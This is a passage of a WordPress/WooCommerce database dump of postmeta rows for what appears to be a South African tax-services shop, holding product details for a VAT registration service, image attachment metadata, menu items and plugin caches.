10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1338,77,'_thumbnail_id','235'),(1339,235,'_wp_attachment_image_alt','Vat Registration'),(1340,77,'_wc_rating_count','a:0:{}'),(1341,77,'_wc_review_count','0'),(1342,77,'_wc_average_rating','0'),(1343,237,'_edit_lock','1525625965:1'),(1344,237,'_edit_last','1'),(1345,237,'_visibility','visible'),(1346,237,'_stock_status','instock'),(1347,237,'yikes_woo_products_tabs','a:2:{i:0;a:3:{s:5:\"title\";s:19:\"What do we require?\";s:2:\"id\";s:18:\"what-do-we-require\";s:7:\"content\";s:1363:\"•Original letter on the Company’s letterhead confirming the Registered Representative/ Public Officer of the company. (This letter should be originally signed by all directors/ members).\r\n•Original proof of address of the Registered Representative/ Public Officer.\r\n•Original certified Identity copy of Registered Representative/ Public Officer.\r\n•CC/Company registration documentation.\r\n•An original letter from the bank confirming the business bank account (must state when the account was opened, with a bank stamp not older than 1 month).\r\n•Original recent three months bank statements, with a bank stamp (minimum transaction required\r\nR 50,000.00 sales).\r\n•Invoices made out to the clients minimum\r\nR 50,000.00 invoices.\r\n•Original business municipal account or utility bill (not older than a month) or a CRA01 form (supplied by us) for purpose of proof of address.\r\n•Original municipal account or utility bill in the name of Members/Directors confirming the residential address. (not older than a month\r\n•Original certified clear Identity copies of Member/Directors.\r\n•SARS power of attorney which gives us the authority to apply for VAT on your behalf (which will be sent to you via email once the order is placed). The power of attorney should be signed and returned to us in original together with all the requested documentation.\";}i:1;a:3:{s:5:\"title\";s:24:\"What are you purchasing?\";s:2:\"id\";s:23:\"what-are-you-purchasing\";s:7:\"content\";s:150:\"<ul>\r\n 	<li>On completion of the VAT Registration you will receive a VAT Registration Certificate with your/business VAT Number from SARS.</li>\r\n</ul>\";}}'),(1348,237,'_downloadable','no'),(1349,237,'_virtual','yes'),(1350,237,'_purchase_note',''),(1351,237,'_featured','yes'),(1352,237,'_weight',''),(1353,237,'_length',''),(1354,237,'_width',''),(1355,237,'_height',''),(1356,237,'_sku','SARS005'),(1357,237,'_product_attributes','a:0:{}'),(1358,237,'_regular_price','5000'),(1359,237,'_sale_price',''),(1360,237,'_sale_price_dates_from',''),(1361,237,'_sale_price_dates_to',''),(1362,237,'_price','5000'),(1363,237,'_sold_individually','yes'),(1364,237,'_manage_stock','no'),(1365,237,'_backorders','no'),(1366,237,'_stock',NULL),(1367,237,'_upsell_ids','a:0:{}'),(1368,237,'_crosssell_ids','a:0:{}'),(1369,237,'_product_version','3.3.5'),(1370,237,'_product_image_gallery',''),(1372,238,'_wp_attached_file','2016/03/Vat-Registration-final-urgent.png'),(1373,238,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:41:\"2016/03/Vat-Registration-final-urgent.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:41:\"Vat-Registration-final-urgent-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1374,238,'_wp_attachment_image_alt','Vat Registration Urgent'),(1375,237,'_thumbnail_id','238'),(1376,237,'total_sales','5'),(1377,239,'_wp_attached_file','2016/03/Income-tax-registration-1.png'),(1378,239,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:37:\"2016/03/Income-tax-registration-1.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"Income-tax-registration-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"Income-tax-registration-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:37:\"Income-tax-registration-1-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1379,239,'_wp_attachment_image_alt','Income tax registration'),(1380,74,'_thumbnail_id','239'),(1381,241,'_wp_attached_file','2016/03/PAYE-registration-final-1.png'),(1382,241,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:37:\"2016/03/PAYE-registration-final-1.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"PAYE-registration-final-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"PAYE-registration-final-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-200x200.png\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:37:\"PAYE-registration-final-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1383,241,'_wp_attachment_image_alt','Salary Tax registration'),(1384,75,'_thumbnail_id','241'),(1385,74,'_wc_rating_count','a:0:{}'),(1386,74,'_wc_average_rating','0'),(1387,237,'_wc_rating_count','a:0:{}'),(1388,237,'_wc_average_rating','0'),(1397,243,'_menu_item_type','post_type'),(1398,243,'_menu_item_menu_item_parent','45'),(1399,243,'_menu_item_object_id','237'),(1400,243,'_menu_item_object','product'),(1401,243,'_menu_item_target',''),(1402,243,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1403,243,'_menu_item_xfn',''),(1404,243,'_menu_item_url',''),(1429,75,'_wc_rating_count','a:0:{}'),(1430,75,'_wc_average_rating','0'),(1431,76,'_wc_rating_count','a:0:{}'),(1432,76,'_wc_average_rating','0'),(1436,75,'_wc_review_count','0'),(1439,74,'_wc_review_count','0'),(1467,73,'_wc_rating_count','a:0:{}'),(1468,73,'_wc_average_rating','0'),(1469,72,'_wc_rating_count','a:0:{}'),(1470,72,'_wc_review_count','0'),(1471,72,'_wc_average_rating','0'),(1472,71,'_wc_rating_count','a:0:{}'),(1473,71,'_wc_review_count','0'),(1474,71,'_wc_average_rating','0'),(1475,267,'_edit_lock','1465981886:2'),(1476,267,'_edit_last','2'),(1478,267,'_responsive_layout','default'),(1519,6,'_edit_lock','1563456192:1'),(1520,6,'_edit_last','1'),(1521,6,'_wp_page_template','page-template-blank.php'),(1522,6,'_responsive_layout','default'),(1523,5,'_edit_lock','1563455030:1'),(1524,5,'_edit_last','1'),(1525,5,'_wp_page_template','page-template-blank.php'),(1526,5,'_responsive_layout','default'),(1527,7,'_edit_lock','1509543046:1'),(1528,7,'_edit_last','1'),(1529,7,'_wp_page_template','default'),(1530,7,'_responsive_layout','default'),(1661,76,'_wc_review_count','0'),(1742,70,'_wc_rating_count','a:0:{}'),(1743,70,'_wc_average_rating','0'),(1785,237,'_wc_review_count','0'),(1826,73,'_wc_review_count','0'),(1873,287,'_edit_lock','1525598302:1'),(1874,287,'_edit_last','1'),(1875,287,'_wp_page_template','default'),(1876,287,'_responsive_layout','default'),(1877,293,'_edit_lock','1499070044:3'),(1878,293,'_edit_last','1'),(1879,293,'_wp_page_template','default'),(1880,293,'_responsive_layout','default'),(1881,295,'_edit_lock','1460026627:1'),(1882,295,'_edit_last','1'),(1883,295,'_wp_page_template','default'),(1884,295,'_responsive_layout','default'),(1885,297,'_menu_item_type','post_type'),(1886,297,'_menu_item_menu_item_parent','36'),(1887,297,'_menu_item_object_id','295'),(1888,297,'_menu_item_object','page'),(1889,297,'_menu_item_target',''),(1890,297,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1891,297,'_menu_item_xfn',''),(1892,297,'_menu_item_url',''),(1894,298,'_menu_item_type','post_type'),(1895,298,'_menu_item_menu_item_parent','36'),(1896,298,'_menu_item_object_id','293'),(1897,298,'_menu_item_object','page'),(1898,298,'_menu_item_target',''),(1899,298,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1900,298,'_menu_item_xfn',''),(1901,298,'_menu_item_url',''),(1958,309,'_edit_lock','1504010660:1'),(1959,309,'_edit_last','1'),(1961,309,'_responsive_layout','default'),(1972,314,'_edit_lock','1465981418:2'),(1973,314,'_edit_last','2'),(2015,314,'_responsive_layout','default'),(2096,319,'_edit_lock','1526285749:1'),(2097,319,'_edit_last','1'),(2099,319,'_responsive_layout','default'),(2101,322,'_edit_lock','1465981191:2'),(2102,322,'_edit_last','2'),(2104,322,'_responsive_layout','default'),(2105,324,'_edit_lock','1480588605:2'),(2106,324,'_edit_last','2'),(2108,324,'_responsive_layout','default'),(2113,329,'_edit_lock','1465981178:2'),(2114,329,'_edit_last','2'),(2116,329,'_responsive_layout','default'),(2160,335,'_edit_lock','1480588759:2'),(2161,335,'_edit_last','2'),(2165,335,'_responsive_layout','default'),(2409,357,'_edit_lock','1560856929:3'),(2410,357,'_edit_last','3'),(2411,357,'_responsive_layout','default'),(2412,366,'_edit_lock','1460371030:1'),(2413,366,'_edit_last','1'),(2414,366,'_wp_page_template','default'),(2415,366,'_responsive_layout','default'),(2416,369,'_edit_lock','1526050317:3'),(2417,369,'_edit_last','3'),(2419,369,'_responsive_layout','default'),(2455,70,'_wc_review_count','0'),(2457,184,'dojodigital_toggle_title','on'),(2458,397,'_edit_lock','1526050022:3'),(2459,397,'_edit_last','3'),(2460,397,'_responsive_layout','default'),(2461,309,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1489951079;s:7:\"payload\";a:0:{}}}'),(2468,314,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486912887;s:7:\"payload\";a:0:{}}}'),(2469,335,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486956025;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:329;}i:1;a:1:{s:2:\"id\";i:324;}i:2;a:1:{s:2:\"id\";i:91;}}}}'),(2470,267,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486912888;s:7:\"payload\";a:0:{}}}'),(2471,237,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1488052726;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:77;}i:1;a:1:{s:2:\"id\";i:74;}i:2;a:1:{s:2:\"id\";i:75;}}}}'),(2472,74,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1488256205;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:76;}i:1;a:1:{s:2:\"id\";i:75;}i:2;a:1:{s:2:\"id\";i:70;}}}}'),(2473,78,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1489966339;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:74;}i:1;a:1:{s:2:\"id\";i:77;}i:2;a:1:{s:2:\"id\";i:76;}}}}'),(2474,404,'_wp_attached_file','2016/03/Tax-Clearance-Certificate.gif'),(2475,404,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:37:\"2016/03/Tax-Clearance-Certificate.gif\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-400x400.gif\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/gif\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-510x510.gif\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/gif\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-100x100.gif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/gif\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-300x300.gif\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-100x100.gif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/gif\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-400x400.gif\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/gif\";s:9:\"uncropped\";b:0;}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-100x100.gif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-200x200.gif\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-300x300.gif\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-450x450.gif\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:37:\"Tax-Clearance-Certificate-600x600.gif\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2476,76,'_thumbnail_id','404'),(2477,76,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1486481560;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:74;}i:1;a:1:{s:2:\"id\";i:70;}i:2;a:1:{s:2:\"id\";i:77;}}}}'),(2478,28,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1490557812;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:59;}i:1;a:1:{s:2:\"id\";i:62;}i:2;a:1:{s:2:\"id\";i:72;}}}}'),(2479,76,'_wpas_done_all','1'),(2480,329,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1488393734;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:324;}i:1;a:1:{s:2:\"id\";i:91;}i:2;a:1:{s:2:\"id\";i:118;}}}}'),(2481,79,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1489447272;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:76;}i:1;a:1:{s:2:\"id\";i:59;}i:2;a:1:{s:2:\"id\";i:28;}}}}'),(2482,322,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486912887;s:7:\"payload\";a:0:{}}}'),(2483,324,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1490294186;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:329;}i:1;a:1:{s:2:\"id\";i:335;}i:2;a:1:{s:2:\"id\";i:118;}}}}'),(2484,75,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1490494559;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:74;}i:1;a:1:{s:2:\"id\";i:76;}i:2;a:1:{s:2:\"id\";i:70;}}}}'),(2485,369,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1488056591;s:7:\"payload\";a:0:{}}}'),(2486,408,'_wpas_done_all','1'),(2487,408,'_mc4wp_settings','a:9:{s:5:\"lists\";a:1:{i:0;s:10:\"be863dcc7d\";}s:15:\"required_fields\";s:11:\"EMAIL,FNAME\";s:12:\"double_optin\";s:1:\"0\";s:12:\"send_welcome\";s:1:\"0\";s:15:\"update_existing\";s:1:\"0\";s:17:\"replace_interests\";s:1:\"1\";s:18:\"hide_after_success\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:3:\"css\";s:10:\"theme-blue\";}'),(2488,409,'_mc4wp_settings','a:9:{s:15:\"required_fields\";s:11:\"EMAIL,FNAME\";s:5:\"lists\";a:1:{i:0;s:10:\"abaf610c73\";}s:12:\"double_optin\";s:1:\"0\";s:12:\"send_welcome\";s:1:\"0\";s:15:\"update_existing\";s:1:\"0\";s:17:\"replace_interests\";s:1:\"1\";s:18:\"hide_after_success\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:3:\"css\";s:9:\"theme-red\";}'),(2489,409,'text_subscribed','Thank you, your request was successful! Please check your email inbox or spam folder for the download link'),(2490,409,'text_invalid_email','Please provide a valid email address.'),(2491,409,'text_required_field_missing','Please fill in the required fields.'),(2492,409,'text_already_subscribed','Given email address is already subscribed, thank you!'),(2493,409,'text_error','Oops. Something went wrong. Please try again later.'),(2494,409,'text_unsubscribed','You were successfully unsubscribed.'),(2495,409,'text_not_subscribed','Given email address is not subscribed.'),(2496,409,'text_no_lists_selected','Please select at least one list.'),(2497,65,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1490201272;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:62;}i:1;a:1:{s:2:\"id\";i:59;}i:2;a:1:{s:2:\"id\";i:28;}}}}'),(2498,112,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1489787281;s:7:\"payload\";a:0:{}}}'),(2499,96,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1488038971;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:335;}i:1;a:1:{s:2:\"id\";i:329;}i:2;a:1:{s:2:\"id\";i:324;}}}}'),(2500,64,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1490557802;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:68;}i:1;a:1:{s:2:\"id\";i:28;}i:2;a:1:{s:2:\"id\";i:70;}}}}'),(2501,134,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1490103037;s:7:\"payload\";a:0:{}}}'),(2502,77,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1487803387;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:237;}i:1;a:1:{s:2:\"id\";i:74;}i:2;a:1:{s:2:\"id\";i:75;}}}}'),(2503,80,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd6